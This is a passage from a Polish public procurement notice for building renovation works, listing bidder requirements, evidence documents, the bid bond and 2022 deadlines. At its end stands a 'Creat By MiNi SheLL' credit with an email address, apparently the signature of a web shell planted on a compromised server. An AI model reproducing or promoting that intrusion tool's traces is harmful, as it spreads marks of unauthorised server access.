odpowiednim poziomie jakości:<br/>Dla części A i B:<br/>- dysponowanie min. 1 osobą posiadającą odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, <br/>w rozumieniu art. 15a ust. 5 ustawy z dnia 7 lipca 1994 r. Prawo budowlane <br/>(t. jedn. Dz. U. z 2021 r., poz. 2351 ze zm.)<br/>Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne <br/>w budownictwie, określone w art.12 ust.1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jedn. Dz. U. z 2021 r., poz. 1646). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu <br/>o udzielenie zamówienia i wykazania braku podstaw wykluczenia, o których mowa w niniejszej SWZ, Zamawiający żąda aby Wykonawca złożył wraz z ofertą:<br/> Wymagany dokument<br/>1	Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału Aktualne na dzień składania ofert oświadczenia w zakresie wskazanym w Załączniku Nr 2A, 2B i 3A, 3B do SWZ. Informacje zawarte <br/>w oświadczeniach, będą stanowić wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu z postępowania oraz spełnia warunki udziału <br/>w postępowaniu. Oświadczenia te wykonawca składa zgodnie ze wzorami stanowiącymi Załącznik Nr 2A, 2B i 3A, 3B do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenia, o którym mowa powyżej składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te, mają potwierdzać spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, <br/>w zakresie w jakim powołuje się na ich zasoby, warunków udziału <br/>w postępowaniu, zamieszcza informację o tych podmiotach w oświadczeniach, o których mowa powyżej (zał. 2A, 2B i 3A, 3B) SWZ, dla każdego z tych podmiotów odrębnie.<br/>2	Zobowiązanie podmiotu udostępniającego zasoby<br/>Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – zał. nr 8A, 8B do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym termnie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych: <br/>Wymagany dokument<br/>1	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane w sposób należyty, zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów inne dokumenty - wg wzoru stanowiącego załącznik nr 5A, 5B do SWZ. Wykaz ten powinien zawierać - co najmniej 1 robotę budowlaną (przez roboty budowlane rozumie się wykonywanie prac na podstawie 1 umowy) polegającą na: <br/>- dla części A - remoncie i konserwacji budynków,<br/>- dla części B - remoncie i konserwacji budynków lub budowie i remoncie małej architektury drewnianej lub wszystkich wskazanych razem prac.<br/>Prace o wartości co najmniej 50 tys. zł. brutto.<br/>2	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia, <br/>w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami - wg wzoru stanowiącego załącznik nr 6A, 6B do SWZ.<br/>3	Dokumenty dotyczące przynależności do grupy kapitałowej<br/>Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz <br/>z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załączniki nr 7A, 7B do SWZ.<br/>4	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>5 Oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w art. 108 ust. 1 pkt 3,4,5,6 art. 109 ust. 1 pkt 1, 5, 7, 8 ustawy PZP.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta musi zawierać następujące oświadczenia i dokumenty dla części A i B:<br/>1	Formularz oferty. Do przygotowania oferty zaleca się skorzystanie <br/>z Formularza oferty, stanowiącego załącznik Nr 1A, 1B do SWZ. <br/>W przypadku gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru Formularza oferty, oferta powinna zawierać wszystkie informacje wymagane we wzorze.<br/>2	Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału Aktualne na dzień składania ofert oświadczenie Wykonawcy stanowiące wstępne potwierdzenie spełniania warunków udziału <br/>w postepowaniu (zgodnie z zał. 2 i 3 do SWZ).<br/>3 Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy. Upoważnienie osób podpisujących ofertę wynikać musi bezpośrednio z dokumentów dołączonych do oferty. Jeżeli upoważnienie takie nie wynika wprost z dokumentów rejestrowych (KRS, CEiDG lub innego właściwego rejestru), to do oferty należy dołączyć inny dokument potwierdzający umocowanie do reprezentowania wykonawcy.<br/><br/>Oferta wraz ze stanowiącymi jej integralną część załącznikami musi być sporządzona w języku polskim i złożona pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej, za pośrednictwem Platformy oraz podpisana kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta powinna być zabezpieczona wadium w wysokości:<br/>- dla Części A: 1 500,00 zł. (jeden tysiąc pięćset złotych),<br/>- dla Części B: 1 500,00 zł. (jeden tysiąc pięćset złotych). <br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2020r. poz. 229 ze zm.). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2	Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie:<br/>•	postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>•	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>•	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału”, o którym mowa w pkt. 10.1 SWZ oraz podmiotowe środki dowodowe, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie na potwierdzenie braku podstaw wykluczenia. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4	Zamawiający nie określa sposobu spełniania warunków udziału w postępowaniu przez wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zawarty jest we wzorze umowy zamieszczony na stronie prowadzonego postępowania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-21 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-21 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com